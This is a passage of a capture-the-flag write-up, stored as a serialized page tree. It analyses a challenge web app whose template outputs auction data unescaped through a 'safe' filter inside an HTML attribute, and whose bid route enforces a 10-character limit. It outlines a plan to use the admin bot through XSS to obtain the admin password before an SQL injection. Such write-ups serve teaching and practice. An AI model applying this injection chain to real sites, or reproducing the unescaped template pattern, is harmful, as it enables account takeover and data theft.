[..",{"type":33,"tag":128,"props":5760,"children":5761},{"style":306},[5762],{"type":38,"value":5763},"SNIP",{"type":33,"tag":128,"props":5765,"children":5766},{"style":312},[5767],{"type":38,"value":5768},"...]\n",{"type":33,"tag":128,"props":5770,"children":5771},{"class":130,"line":848},[5772],{"type":33,"tag":128,"props":5773,"children":5774},{"emptyLinePlaceholder":896},[5775],{"type":38,"value":899},{"type":33,"tag":128,"props":5777,"children":5778},{"class":130,"line":976},[5779,5783,5788,5792,5797,5802,5806,5811],{"type":33,"tag":128,"props":5780,"children":5781},{"style":300},[5782],{"type":38,"value":5696},{"type":33,"tag":128,"props":5784,"children":5785},{"style":306},[5786],{"type":38,"value":5787}," results",{"type":33,"tag":128,"props":5789,"children":5790},{"style":312},[5791],{"type":38,"value":5657},{"type":33,"tag":128,"props":5793,"children":5794},{"style":1576},[5795],{"type":38,"value":5796}," await",{"type":33,"tag":128,"props":5798,"children":5799},{"style":135},[5800],{"type":38,"value":5801}," runReadOnlyQuery",{"type":33,"tag":128,"props":5803,"children":5804},{"style":312},[5805],{"type":38,"value":5566},{"type":33,"tag":128,"props":5807,"children":5808},{"style":306},[5809],{"type":38,"value":5810},"query",{"type":33,"tag":128,"props":5812,"children":5813},{"style":312},[5814],{"type":38,"value":5815},");\n",{"type":33,"tag":128,"props":5817,"children":5818},{"class":130,"line":988},[5819,5824,5828,5832,5837,5842,5846,5851,5855,5859],{"type":33,"tag":128,"props":5820,"children":5821},{"style":306},[5822],{"type":38,"value":5823}," res",{"type":33,"tag":128,"props":5825,"children":5826},{"style":312},[5827],{"type":38,"value":215},{"type":33,"tag":128,"props":5829,"children":5830},{"style":135},[5831],{"type":38,"value":633},{"type":33,"tag":128,"props":5833,"children":5834},{"style":312},[5835],{"type":38,"value":5836},"({",{"type":33,"tag":128,"props":5838,"children":5839},{"style":437},[5840],{"type":38,"value":5841}," success",{"type":33,"tag":128,"props":5843,"children":5844},{"style":312},[5845],{"type":38,"value":284},{"type":33,"tag":128,"props":5847,"children":5848},{"style":1576},[5849],{"type":38,"value":5850}," true",{"type":33,"tag":128,"props":5852,"children":5853},{"style":312},[5854],{"type":38,"value":5584},{"type":33,"tag":128,"props":5856,"children":5857},{"style":306},[5858],{"type":38,"value":5787},{"type":33,"tag":128,"props":5860,"children":5861},{"style":312},[5862],{"type":38,"value":5863}," });\n",{"type":33,"tag":128,"props":5865,"children":5866},{"class":130,"line":1001},[5867],{"type":33,"tag":128,"props":5868,"children":5869},{"style":312},[5870],{"type":38,"value":845},{"type":33,"tag":128,"props":5872,"children":5873},{"class":130,"line":1014},[5874,5879,5883],{"type":33,"tag":128,"props":5875,"children":5876},{"style":312},[5877],{"type":38,"value":5878}," [..",{"type":33,"tag":128,"props":5880,"children":5881},{"style":306},[5882],{"type":38,"value":5763},{"type":33,"tag":128,"props":5884,"children":5885},{"style":312},[5886],{"type":38,"value":5768},{"type":33,"tag":128,"props":5888,"children":5889},{"class":130,"line":1026},[5890],{"type":33,"tag":128,"props":5891,"children":5892},{"style":323},[5893],{"type":38,"value":5894}," \n",{"type":33,"tag":128,"props":5896,"children":5897},{"class":130,"line":1038},[5898],{"type":33,"tag":128,"props":5899,"children":5900},{"style":312},[5901],{"type":38,"value":5902},"});\n",{"type":33,"tag":47,"props":5904,"children":5905},{},[5906],{"type":38,"value":5907},"The idea now would be to use the bot to retrieve the unencrypted admin password in order to then exploit the SQL injection",{"type":33,"tag":40,"props":5909,"children":5911},{"id":5910},"xss-unintended",[5912],{"type":38,"value":5913},"XSS [UNINTENDED]",{"type":33,"tag":47,"props":5915,"children":5916},{},[5917,5919,5925],{"type":38,"value":5918},"To execute actions on the bot, we need a primitive that would allow us to execute code on the bot's browser, in other words, an XSS. We can see in the route that displays the auctions that the keyword ",{"type":33,"tag":105,"props":5920,"children":5922},{"className":5921},[],[5923],{"type":38,"value":5924},"unsafe",{"type":38,"value":5926}," is used in the data-auction tag.",{"type":33,"tag":114,"props":5928,"children":5930},{"lang":5929},"html",[5931],{"type":33,"tag":119,"props":5932,"children":5935},{"className":5933,"code":5934,"language":5929,"meta":8,"style":8},"language-html shiki shiki-themes vitesse-dark","{% extends \"layout.html\" %}\n\n{% block content %}\n\u003C!-- Pass the auction data as a JSON string via a data attribute -->\n\u003Cdiv id=\"auction-details-panel\" class=\"rpg-panel\" data-auction='{{ auction | dump | safe }}'> \u003C!-- \u003C-- INJECTION -->\n \u003Cdiv class=\"panel-header\">\n \u003Ci class=\"fa-solid fa-gavel\">\u003C/i>\n \u003Ch2 class=\"panel-title\">Auction Details\u003C/h2>\n \u003C/div>\n [...SNIP...]\n\u003C/div>\n{% endblock %}\n",[5936],{"type":33,"tag":105,"props":5937,"children":5938},{"__ignoreMap":8},[5939,5947,5954,5962,5970,6060,6098,6145,6199,6215,6223,6238],{"type":33,"tag":128,"props":5940,"children":5941},{"class":130,"line":131},[5942],{"type":33,"tag":128,"props":5943,"children":5944},{"style":323},[5945],{"type":38,"value":5946},"{% extends \"layout.html\" %}\n",{"type":33,"tag":128,"props":5948,"children":5949},{"class":130,"line":362},[5950],{"type":33,"tag":128,"props":5951,"children":5952},{"emptyLinePlaceholder":896},[5953],{"type":38,"value":899},{"type":33,"tag":128,"props":5955,"children":5956},{"class":130,"line":403},[5957],{"type":33,"tag":128,"props":5958,"children":5959},{"style":323},[5960],{"type":38,"value":5961},"{% block content %}\n",{"type":33,"tag":128,"props":5963,"children":5964},{"class":130,"line":739},[5965],{"type":33,"tag":128,"props":5966,"children":5967},{"style":5541},[5968],{"type":38,"value":5969},"\u003C!-- Pass the auction data as a JSON string via a data attribute -->\n",{"type":33,"tag":128,"props":5971,"children":5972},{"class":130,"line":765},[5973,5978,5983,5988,5992,5996,6001,6005,6010,6014,6018,6023,6027,6032,6036,6041,6046,6050,6055],{"type":33,"tag":128,"props":5974,"children":5975},{"style":312},[5976],{"type":38,"value":5977},"\u003C",{"type":33,"tag":128,"props":5979,"children":5980},{"style":1576},[5981],{"type":38,"value":5982},"div",{"type":33,"tag":128,"props":5984,"children":5985},{"style":306},[5986],{"type":38,"value":5987}," id",{"type":33,"tag":128,"props":5989,"children":5990},{"style":312},[5991],{"type":38,"value":315},{"type":33,"tag":128,"props":5993,"children":5994},{"style":676},[5995],{"type":38,"value":669},{"type":33,"tag":128,"props":5997,"children":5998},{"style":140},[5999],{"type":38,"value":6000},"auction-details-panel",{"type":33,"tag":128,"props":6002,"children":6003},{"style":676},[6004],{"type":38,"value":669},{"type":33,"tag":128,"props":6006,"children":6007},{"style":306},[6008],{"type":38,"value":6009}," class",{"type":33,"tag":128,"props":6011,"children":6012},{"style":312},[6013],{"type":38,"value":315},{"type":33,"tag":128,"props":6015,"children":6016},{"style":676},[6017],{"type":38,"value":669},{"type":33,"tag":128,"props":6019,"children":6020},{"style":140},[6021],{"type":38,"value":6022},"rpg-panel",{"type":33,"tag":128,"props":6024,"children":6025},{"style":676},[6026],{"type":38,"value":669},{"type":33,"tag":128,"props":6028,"children":6029},{"style":306},[6030],{"type":38,"value":6031}," data-auction",{"type":33,"tag":128,"props":6033,"children":6034},{"style":312},[6035],{"type":38,"value":315},{"type":33,"tag":128,"props":6037,"children":6038},{"style":676},[6039],{"type":38,"value":6040},"'",{"type":33,"tag":128,"props":6042,"children":6043},{"style":140},[6044],{"type":38,"value":6045},"{{ auction | dump | safe }}",{"type":33,"tag":128,"props":6047,"children":6048},{"style":676},[6049],{"type":38,"value":6040},{"type":33,"tag":128,"props":6051,"children":6052},{"style":312},[6053],{"type":38,"value":6054},">",{"type":33,"tag":128,"props":6056,"children":6057},{"style":5541},[6058],{"type":38,"value":6059}," \u003C!-- \u003C-- INJECTION -->\n",{"type":33,"tag":128,"props":6061,"children":6062},{"class":130,"line":804},[6063,6068,6072,6076,6080,6084,6089,6093],{"type":33,"tag":128,"props":6064,"children":6065},{"style":312},[6066],{"type":38,"value":6067}," \u003C",{"type":33,"tag":128,"props":6069,"children":6070},{"style":1576},[6071],{"type":38,"value":5982},{"type":33,"tag":128,"props":6073,"children":6074},{"style":306},[6075],{"type":38,"value":6009},{"type":33,"tag":128,"props":6077,"children":6078},{"style":312},[6079],{"type":38,"value":315},{"type":33,"tag":128,"props":6081,"children":6082},{"style":676},[6083],{"type":38,"value":669},{"type":33,"tag":128,"props":6085,"children":6086},{"style":140},[6087],{"type":38,"value":6088},"panel-header",{"type":33,"tag":128,"props":6090,"children":6091},{"style":676},[6092],{"type":38,"value":669},{"type":33,"tag":128,"props":6094,"children":6095},{"style":312},[6096],{"type":38,"value":6097},">\n",{"type":33,"tag":128,"props":6099,"children":6100},{"class":130,"line":839},[6101,6106,6111,6115,6119,6123,6128,6132,6137,6141],{"type":33,"tag":128,"props":6102,"children":6103},{"style":312},[6104],{"type":38,"value":6105}," \u003C",{"type":33,"tag":128,"props":6107,"children":6108},{"style":1576},[6109],{"type":38,"value":6110},"i",{"type":33,"tag":128,"props":6112,"children":6113},{"style":306},[6114],{"type":38,"value":6009},{"type":33,"tag":128,"props":6116,"children":6117},{"style":312},[6118],{"type":38,"value":315},{"type":33,"tag":128,"props":6120,"children":6121},{"style":676},[6122],{"type":38,"value":669},{"type":33,"tag":128,"props":6124,"children":6125},{"style":140},[6126],{"type":38,"value":6127},"fa-solid fa-gavel",{"type":33,"tag":128,"props":6129,"children":6130},{"style":676},[6131],{"type":38,"value":669},{"type":33,"tag":128,"props":6133,"children":6134},{"style":312},[6135],{"type":38,"value":6136},">\u003C/",{"type":33,"tag":128,"props":6138,"children":6139},{"style":1576},[6140],{"type":38,"value":6110},{"type":33,"tag":128,"props":6142,"children":6143},{"style":312},[6144],{"type":38,"value":6097},{"type":33,"tag":128,"props":6146,"children":6147},{"class":130,"line":848},[6148,6152,6156,6160,6164,6168,6173,6177,6181,6186,6191,6195],{"type":33,"tag":128,"props":6149,"children":6150},{"style":312},[6151],{"type":38,"value":6105},{"type":33,"tag":128,"props":6153,"children":6154},{"style":1576},[6155],{"type":38,"value":40},{"type":33,"tag":128,"props":6157,"children":6158},{"style":306},[6159],{"type":38,"value":6009},{"type":33,"tag":128,"props":6161,"children":6162},{"style":312},[6163],{"type":38,"value":315},{"type":33,"tag":128,"props":6165,"children":6166},{"style":676},[6167],{"type":38,"value":669},{"type":33,"tag":128,"props":6169,"children":6170},{"style":140},[6171],{"type":38,"value":6172},"panel-title",{"type":33,"tag":128,"props":6174,"children":6175},{"style":676},[6176],{"type":38,"value":669},{"type":33,"tag":128,"props":6178,"children":6179},{"style":312},[6180],{"type":38,"value":6054},{"type":33,"tag":128,"props":6182,"children":6183},{"style":323},[6184],{"type":38,"value":6185},"Auction Details",{"type":33,"tag":128,"props":6187,"children":6188},{"style":312},[6189],{"type":38,"value":6190},"\u003C/",{"type":33,"tag":128,"props":6192,"children":6193},{"style":1576},[6194],{"type":38,"value":40},{"type":33,"tag":128,"props":6196,"children":6197},{"style":312},[6198],{"type":38,"value":6097},{"type":33,"tag":128,"props":6200,"children":6201},{"class":130,"line":976},[6202,6207,6211],{"type":33,"tag":128,"props":6203,"children":6204},{"style":312},[6205],{"type":38,"value":6206}," \u003C/",{"type":33,"tag":128,"props":6208,"children":6209},{"style":1576},[6210],{"type":38,"value":5982},{"type":33,"tag":128,"props":6212,"children":6213},{"style":312},[6214],{"type":38,"value":6097},{"type":33,"tag":128,"props":6216,"children":6217},{"class":130,"line":988},[6218],{"type":33,"tag":128,"props":6219,"children":6220},{"style":323},[6221],{"type":38,"value":6222}," [...SNIP...]\n",{"type":33,"tag":128,"props":6224,"children":6225},{"class":130,"line":1001},[6226,6230,6234],{"type":33,"tag":128,"props":6227,"children":6228},{"style":312},[6229],{"type":38,"value":6190},{"type":33,"tag":128,"props":6231,"children":6232},{"style":1576},[6233],{"type":38,"value":5982},{"type":33,"tag":128,"props":6235,"children":6236},{"style":312},[6237],{"type":38,"value":6097},{"type":33,"tag":128,"props":6239,"children":6240},{"class":130,"line":1014},[6241],{"type":33,"tag":128,"props":6242,"children":6243},{"style":323},[6244],{"type":38,"value":6245},"{% endblock %}\n",{"type":33,"tag":47,"props":6247,"children":6248},{},[6249],{"type":38,"value":6250},"We will explain in more detail why the injection is possible:",{"type":33,"tag":239,"props":6252,"children":6253},{},[6254,6276,6311],{"type":33,"tag":243,"props":6255,"children":6256},{},[6257,6266,6268,6274],{"type":33,"tag":2302,"props":6258,"children":6259},{},[6260],{"type":33,"tag":105,"props":6261,"children":6263},{"className":6262},[],[6264],{"type":38,"value":6265},"{{ auction }}",{"type":38,"value":6267},": Injects the ",{"type":33,"tag":105,"props":6269,"children":6271},{"className":6270},[],[6272],{"type":38,"value":6273},"auction",{"type":38,"value":6275}," variable into the template.",{"type":33,"tag":243,"props":6277,"children":6278},{},[6279,6288,6290,6295,6297,6302,6304,6310],{"type":33,"tag":2302,"props":6280,"children":6281},{},[6282],{"type":33,"tag":105,"props":6283,"children":6285},{"className":6284},[],[6286],{"type":38,"value":6287},"dump",{"type":38,"value":6289},": Unserializes ",{"type":33,"tag":105,"props":6291,"children":6293},{"className":6292},[],[6294],{"type":38,"value":6273},{"type":38,"value":6296}," to ",{"type":33,"tag":2302,"props":6298,"children":6299},{},[6300],{"type":38,"value":6301},"JSON",{"type":38,"value":6303},". It's like ",{"type":33,"tag":105,"props":6305,"children":6307},{"className":6306},[],[6308],{"type":38,"value":6309},"JSON.stringify(auction)",{"type":38,"value":215},{"type":33,"tag":243,"props":6312,"children":6313},{},[6314,6323,6325,6330,6332,6337,6339,6344,6346,6352,6354,6360,6362],{"type":33,"tag":2302,"props":6315,"children":6316},{},[6317],{"type":33,"tag":105,"props":6318,"children":6320},{"className":6319},[],[6321],{"type":38,"value":6322},"safe",{"type":38,"value":6324},": Indicates that the content is \"safe\" and ",{"type":33,"tag":2302,"props":6326,"children":6327},{},[6328],{"type":38,"value":6329},"prevents HTML escaping",{"type":38,"value":6331},". Without ",{"type":33,"tag":105,"props":6333,"children":6335},{"className":6334},[],[6336],{"type":38,"value":6322},{"type":38,"value":6338},", the ",{"type":33,"tag":105,"props":6340,"children":6342},{"className":6341},[],[6343],{"type":38,"value":669},{"type":38,"value":6345}," and ",{"type":33,"tag":105,"props":6347,"children":6349},{"className":6348},[],[6350],{"type":38,"value":6351},"<",{"type":38,"value":6353}," would be transformed to ",{"type":33,"tag":105,"props":6355,"children":6357},{"className":6356},[],[6358],{"type":38,"value":6359},""",{"type":38,"value":6361}," or ",{"type":33,"tag":105,"props":6363,"children":6365},{"className":6364},[],[6366],{"type":38,"value":6367},"&l",{"type":33,"tag":47,"props":6369,"children":6370},{},[6371,6373,6378],{"type":38,"value":6372},"By analyzing the injection, we can easily guess that it's possible to break the HTML by adding a ",{"type":33,"tag":105,"props":6374,"children":6376},{"className":6375},[],[6377],{"type":38,"value":6040},{"type":38,"value":6379}," which will make us escape the tag. However, if we try to inject an XSS payload, we get an error returned by the server indicating that our input is too long",{"type":33,"tag":75,"props":6381,"children":6383},{"imgSrc":6382},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743103061/writeups/aurors-archive/to_long_error.webp",[],{"type":33,"tag":47,"props":6385,"children":6386},{},[6387],{"type":38,"value":6388},"By analyzing in more detail why this error occurs, we can see that a size check is performed in the backend code.",{"type":33,"tag":114,"props":6390,"children":6391},{"lang":5526},[6392],{"type":33,"tag":119,"props":6393,"children":6395},{"className":5530,"code":6394,"language":5526,"meta":8,"style":8},"router.post('/auctions/:id/bids', isAuthenticated, async (req, res) => {\n try {\n const auctionId = req.params.id;\n const userId = req.session.userId;\n const { bid } = req.body;\n\n if (bid.length > 10) { // \u003C-- CHECK THE LENGTH\n return res.status(400).json({ success: false, message: 'Too long' });\n }\n await placeBid(auctionId, userId, bid);\n return res.json({ success: true });\n } catch (err) {\n console.error('Error placing bid:', err);\n const status = err.message.includes('Invalid') ? 400\n : (err.message.includes('not found') || err.message.includes('closed')) ? 404\n : 500;\n return res.status(status).json({ success: false, message: err.message || 'Internal server error.' });\n }\n});\n",[6396],{"type":33,"tag":105,"props":6397,"children":6398},{"__ignoreMap":8},[6399,6476,6487,6529,6571,6611,6618,6666,6753,6761,6803,6843,6873,6920,6989,7098,7114,7210,7217],{"type":33,"tag":128,"props":6400,"children":6401},{"class":130,"line":131},[6402,6406,6410,6414,6418,6422,6427,6431,6435,6440,6444,6448,6452,6456,6460,6464,6468,6472],{"type":33,"tag":128,"props":6403,"children":6404},{"style":306},[6405],{"type":38,"value":5552},{"type":33,"tag":128,"props":6407,"children":6408},{"style":312},[6409],{"type":38,"value":215},{"type":33,"tag":128,"props":6411,"children":6412},{"style":135},[6413],{"type":38,"value":5561},{"type":33,"tag":128,"props":6415,"children":6416},{"style":312},[6417],{"type":38,"value":5566},{"type":33,"tag":128,"props":6419,"children":6420},{"style":676},[6421],{"type":38,"value":6040},{"type":33,"tag":128,"props":6423,"children":6424},{"style":140},[6425],{"type":38,"value":6426},"/auctions/:id/bids",{"type":33,"tag":128,"props":6428,"children":6429},{"style":676},[6430],{"type":38,"value":6040},{"type":33,"tag":128,"props":6432,"children":6433},{"style":312},[6434],{"type":38,"value":5584},{"type":33,"tag":128,"props":6436,"children":6437},{"style":306},[6438],{"type":38,"value":6439}," isAuthenticated",{"type":33,"tag":128,"props":6441,"children":6442},{"style":312},[6443],{"type":38,"value":5584},{"type":33,"tag":128,"props":6445,"children":6446},{"style":300},[6447],{"type":38,"value":5598},{"type":33,"tag":128,"props":6449,"children":6450},{"style":312},[6451],{"type":38,"value":2852},{"type":33,"tag":128,"props":6453,"children":6454},{"style":306},[6455],{"type":38,"value":5607},{"type":33,"tag":128,"props":6457,"children":6458},{"style":312},[6459],{"type":38,"value":5584},{"type":33,"tag":128,"props":6461,"children":6462},{"style":306},[6463],{"type":38,"value":5616},{"type":33,"tag":128,"props":6465,"children":6466},{"style":312},[6467],{"type":38,"value":2966},{"type":33,"tag":128,"props":6469,"children":6470},{"style":312},[6471],{"type":38,"value":5625},{"type":33,"tag":128,"props":6473,"children":6474},{"style":312},[6475],{"type":38,"value":762},{"type":33,"tag":128,"props":6477,"children":6478},{"class":130,"line":362},[6479,6483],{"type":33,"tag":128,"props":6480,"children":6481},{"style":1576},[6482],{"type":38,"value":5684},{"type":33,"tag":128,"props":6484,"children":6485},{"style":312},[6486],{"type":38,"value":762},{"type":33,"tag":128,"props":6488,"children":6489},{"class":130,"line":403},[6490,6494,6499,6503,6507,6511,6516,6520,6525],{"type":33,"tag":128,"props":6491,"children":6492},{"style":300},[6493],{"type":38,"value":5696},{"type":33,"tag":128,"props":6495,"children":6496},{"style":306},[6497],{"type":38,"value":6498}," auctionId",{"type":33,"tag":128,"props":6500,"children":6501},{"style":312},[6502],{"type":38,"value":5657},{"type":33,"tag":128,"props":6504,"children":6505},{"style":306},[6506],{"type":38,"value":5662},{"type":33,"tag":128,"props":6508,"children":6509},{"style":312},[6510],{"type":38,"value":215},{"type":33,"tag":128,"props":6512,"children":6513},{"style":306},[6514],{"type":38,"value":6515},"params",{"type":33,"tag":128,"props":6517,"children":6518},{"style":312},[6519],{"type":38,"value":215},{"type":33,"tag":128,"props":6521,"children":6522},{"style":306},[6523],{"type":38,"value":6524},"id",{"type":33,"tag":128,"props":6526,"children":6527},{"style":312},[6528],{"type":38,"value":5676},{"type":33,"tag":128,"props":6530,"children":6531},{"class":130,"line":739},[6532,6536,6541,6545,6549,6553,6558,6562,6567],{"type":33,"tag":128,"props":6533,"children":6534},{"style":300},[6535],{"type":38,"value":5696},{"type":33,"tag":128,"props":6537,"children":6538},{"style":306},[6539],{"type":38,"value":6540}," userId",{"type":33,"tag":128,"props":6542,"children":6543},{"style":312},[6544],{"type":38,"value":5657},{"type":33,"tag":128,"props":6546,"children":6547},{"style":306},[6548],{"type":38,"value":5662},{"type":33,"tag":128,"props":6550,"children":6551},{"style":312},[6552],{"type":38,"value":215},{"type":33,"tag":128,"props":6554,"children":6555},{"style":306},[6556],{"type":38,"value":6557},"session",{"type":33,"tag":128,"props":6559,"children":6560},{"style":312},[6561],{"type":38,"value":215},{"type":33,"tag":128,"props":6563,"children":6564},{"style":306},[6565],{"type":38,"value":6566},"userId",{"type":33,"tag":128,"props":6568,"children":6569},{"style":312},[6570],{"type":38,"value":5676},{"type":33,"tag":128,"props":6572,"children":6573},{"class":130,"line":765},[6574,6578,6582,6587,6591,6595,6599,6603,6607],{"type":33,"tag":128,"props":6575,"children":6576},{"style":300},[6577],{"type":38,"value":5696},{"type":33,"tag":128,"props":6579,"children":6580},{"style":312},[6581],{"type":38,"value":5642},{"type":33,"tag":128,"props":6583,"children":6584},{"style":306},[6585],{"type":38,"value":6586}," bid",{"type":33,"tag":128,"props":6588,"children":6589},{"style":312},[6590],{"type":38,"value":5652},{"type":33,"tag":128,"props":6592,"children":6593},{"style":312},[6594],{"type":38,"value":5657},{"type":33,"tag":128,"props":6596,"children":6597},{"style":306},[6598],{"type":38,"value":5662},{"type":33,"tag":128,"props":6600,"children":6601},{"style":312},[6602],{"type":38,"value":215},{"type":33,"tag":128,"props":6604,"children":6605},{"style":306},[6606],{"type":38,"value":5671},{"type":33,"tag":128,"props":6608,"children":6609},{"style":312},[6610],{"type":38,"value":5676},{"type":33,"tag":128,"props":6612,"children":6613},{"class":130,"line":804},[6614],{"type":33,"tag":128,"props":6615,"children":6616},{"emptyLinePlaceholder":896},[6617],{"type":38,"value":899},{"type":33,"tag":128,"props":6619,"children":6620},{"class":130,"line":839},[6621,6626,6630,6635,6639,6644,6648,6653,6657,6661],{"type":33,"tag":128,"props":6622,"children":6623},{"style":1576},[6624],{"type":38,"value":6625}," if",{"type":33,"tag":128,"props":6627,"children":6628},{"style":312},[6629],{"type":38,"value":2852},{"type":33,"tag":128,"props":6631,"children":6632},{"style":306},[6633],{"type":38,"value":6634},"bid",{"type":33,"tag":128,"props":6636,"children":6637},{"style":312},[6638],{"type":38,"value":215},{"type":33,"tag":128,"props":6640,"children":6641},{"style":437},[6642],{"type":38,"value":6643},"length",{"type":33,"tag":128,"props":6645,"children":6646},{"style":312},[6647],{"type":38,"value":2472},{"type":33,"tag":128,"props":6649,"children":6650},{"style":523},[6651],{"type":38,"value":6652}," 10",{"type":33,"tag":128,"props":6654,"children":6655},{"style":312},[6656],{"type":38,"value":2966},{"type":33,"tag":128,"props":6658,"children":6659},{"style":312},[6660],{"type":38,"value":5642},{"type":33,"tag":128,"props":6662,"children":6663},{"style":5541},[6664],{"type":38,"value":6665}," // \u003C-- CHECK THE LENGTH\n",{"type":33,"tag":128,"props":6667,"children":6668},{"class":130,"line":848},[6669,6674,6678,6682,6687,6691,6696,6701,6705,6709,6713,6717,6722,6726,6731,6735,6740,6745,6749],{"type":33,"tag":128,"props":6670,"children":6671},{"style":1576},[6672],{"type":38,"value":6673}," return",{"type":33,"tag":128,"props":6675,"children":6676},{"style":306},[6677],{"type":38,"value":5616},{"type":33,"tag":128,"props":6679,"children":6680},{"style":312},[6681],{"type":38,"value":215},{"type":33,"tag":128,"props":6683,"children":6684},{"style":135},[6685],{"type":38,"value":6686},"status",{"type":33,"tag":128,"props":6688,"children":6689},{"style":312},[6690],{"type":38,"value":5566},{"type":33,"tag":128,"props":6692,"children":6693},{"style":523},[6694],{"type":38,"value":6695},"400",{"type":33,"tag":128,"props":6697,"children":6698},{"style":312},[6699],{"type":38,"value":6700},").",{"type":33,"tag":128,"props":6702,"children":6703},{"style":135},[6704],{"type":38,"value":633},{"type":33,"tag":128,"props":6706,"children":6707},{"style":312},[6708],{"type":38,"value":5836},{"type":33,"tag":128,"props":6710,"children":6711},{"style":437},[6712],{"type":38,"value":5841},{"type":33,"tag":128,"props":6714,"children":6715},{"style":312},[6716],{"type":38,"value":284},{"type":33,"tag":128,"props":6718,"children":6719},{"style":1576},[6720],{"type":38,"value":6721}," false",{"type":33,"tag":128,"props":6723,"children":6724},{"style":312},[6725],{"type":38,"value":5584},{"type":33,"tag":128,"props":6727,"children":6728},{"style":437},[6729],{"type":38,"value":6730}," message",{"type":33,"tag":128,"props":6732,"children":6733},{"style":312},[6734],{"type":38,"value":284},{"type":33,"tag":128,"props":6736,"children":6737},{"style":676},[6738],{"type":38,"value":6739}," '",{"type":33,"tag":128,"props":6741,"children":6742},{"style":140},[6743],{"type":38,"value":6744},"Too long",{"type":33,"tag":128,"props":6746,"children":6747},{"style":676},[6748],{"type":38,"value":6040},{"type":33,"tag":128,"props":6750,"children":6751},{"style":312},[6752],{"type":38,"value":5863},{"type":33,"tag":128,"props":6754,"children":6755},{"class":130,"line":976},[6756],{"type":33,"tag":128,"props":6757,"children":6758},{"style":312},[6759],{"type":38,"value":6760}," }\n",{"type":33,"tag":128,"props":6762,"children":6763},{"class":130,"line":988},[6764,6769,6774,6778,6783,6787,6791,6795,6799],{"type":33,"tag":128,"props":6765,"children":6766},{"style":1576},[6767],{"type":38,"value":6768}," await",{"type":33,"tag":128,"props":6770,"children":6771},{"style":135},[6772],{"type":38,"value":6773}," placeBid",{"type":33,"tag":128,"props":6775,"children":6776},{"style":312},[6777],{"type":38,"value":5566},{"type":33,"tag":128,"props":6779,"children":6780},{"style":306},[6781],{"type":38,"value":6782},"auctionId",{"type":33,"tag":128,"props":6784,"children":6785},{"style":312},[6786],{"type":38,"value":5584},{"type":33,"tag":128,"props":6788,"children":6789},{"style":306},[6790],{"type":38,"value":6540},{"type":33,"tag":128,"props":6792,"children":6793},{"style":312},[6794],{"type":38,"value":5584},{"type":33,"tag":128,"props":6796,"children":6797},{"style":306},[6798],{"type":38,"value":6586},{"type":33,"tag":128,"props":6800,"children":6801},{"style":312},[6802],{"type":38,"value":5815},{"type":33,"tag":128,"props":6804,"children":6805},{"class":130,"line":1001},[6806,6811,6815,6819,6823,6827,6831,6835,6839],{"type":33,"tag":128,"props":6807,"children":6808},{"style":1576},[6809],{"type":38,"value":6810}," return",{"type":33,"tag":128,"props":6812,"children":6813},{"style":306},[6814],{"type":38,"value":5616},{"type":33,"tag":128,"props":6816,"children":6817},{"style":312},[6818],{"type":38,"value":215},{"type":33,"tag":128,"props":6820,"children":6821},{"style":135},[6822],{"type":38,"value":633},{"type":33,"tag":128,"props":6824,"children":6825},{"style":312},[6826],{"type":38,"value":5836},{"type":33,"tag":128,"props":6828,"children":6829},{"style":437},[6830],{"type":38,"value":5841},{"type":33,"tag":128,"props":6832,"children":6833},{"style":312},[6834],{"type":38,"value":284},{"type":33,"tag":128,"props":6836,"children":6837},{"style":1576},[6838],{"type":38,"value":5850},{"type":33,"tag":128,"props":6840,"children":6841},{"style":312},[6842],{"type":38,"value":5863},{"type":33,"tag":128,"props":6844,"children":6845},{"class":130,"line":1014},[6846,6851,6856,6860,6865,6869],{"type":33,"tag":128,"props":6847,"children":6848},{"style":312},[6849],{"type":38,"value":6850}," }",{"type":33,"tag":128,"props":6852,"children":6853},{"style":1576},[6854],{"type":38,"value":6855}," catch",{"type":33,"tag":128,"props":6857,"children":6858},{"style":312},[6859],{"type":38,"value":2852},{"type":33,"tag":128,"props":6861,"children":6862},{"style":306},[6863],{"type":38,"value":6864},"err",{"type":33,"tag":128,"props":6866,"children":6867},{"style":312},[6868],{"type":38,"value":2966},{"type":33,"tag":128,"props":6870,"children":6871},{"style":312},[6872],{"type":38,"value":762},{"type":33,"tag":128,"props":6874,"children":6875},{"class":130,"line":1026},[6876,6881,6885,6890,6894,6898,6903,6907,6911,6916],{"type":33,"tag":128,"props":6877,"children":6878},{"style":306},[6879],{"type":38,"value":6880}," console",{"type":33,"tag":128,"props":6882,"children":6883},{"style":312},[6884],{"type":38,"value":215},{"type":33,"tag":128,"props":6886,"children":6887},{"style":135},[6888],{"type":38,"value":6889},"error",{"type":33,"tag":128,"props":6891,"children":6892},{"style":312},[6893],{"type":38,"value":5566},{"type":33,"tag":128,"props":6895,"children":6896},{"style":676},[6897],{"type":38,"value":6040},{"type":33,"tag":128,"props":6899,"children":6900},{"style":140},[6901],{"type":38,"value":6902},"Error placing bid:",{"type":33,"tag":128,"props":6904,"children":6905},{"style":676},[6906],{"type":38,"value":6040},{"type":33,"tag":128,"props":6908,"children":6909},{"style":312},[6910],{"type":38,"value":5584},{"type":33,"tag":128,"props":6912,"children":6913},{"style":306},[6914],{"type":38,"value":6915}," err",{"type":33,"tag":128,"props":6917,"children":6918},{"style":312},[6919],{"type":38,"value":5815},{"type":33,"tag":128,"props":6921,"children":6922},{"class":130,"line":1038},[6923,6927,6932,6936,6940,6944,6949,6953,6958,6962,6966,6971,6975,6979,6984],{"type":33,"tag":128,"props":6924,"children":6925},{"style":300},[6926],{"type":38,"value":5696},{"type":33,"tag":128,"props":6928,"children":6929},{"style":306},[6930],{"type":38,"value":6931}," status",{"type":33,"tag":128,"props":6933,"children":6934},{"style":312},[6935],{"type":38,"value":5657},{"type":33,"tag":128,"props":6937,"children":6938},{"style":306},[6939],{"type":38,"value":6915},{"type":33,"tag":128,"props":6941,"children":6942},{"style":312},[6943],{"type":38,"value":215},{"type":33,"tag":128,"props":6945,"children":6946},{"style":306},[6947],{"type":38,"value":6948},"message",{"type":33,"tag":128,"props":6950,"children":6951},{"style":312},[6952],{"type":38,"value":215},{"type":33,"tag":128,"props":6954,"children":6955},{"style":135},[6956],{"type":38,"value":6957},"includes",{"type":33,"tag":128,"props":6959,"children":6960},{"style":312},[6961],{"type":38,"value":5566},{"type":33,"tag":128,"props":6963,"children":6964},{"style":676},[6965],{"type":38,"value":6040},{"type":33,"tag":128,"props":6967,"children":6968},{"style":140},[6969],{"type":38,"value":6970},"Invalid",{"type":33,"tag":128,"props":6972,"children":6973},{"style":676},[6974],{"type":38,"value":6040},{"type":33,"tag":128,"props":6976,"children":6977},{"style":312},[6978],{"type":38,"value":2966},{"type":33,"tag"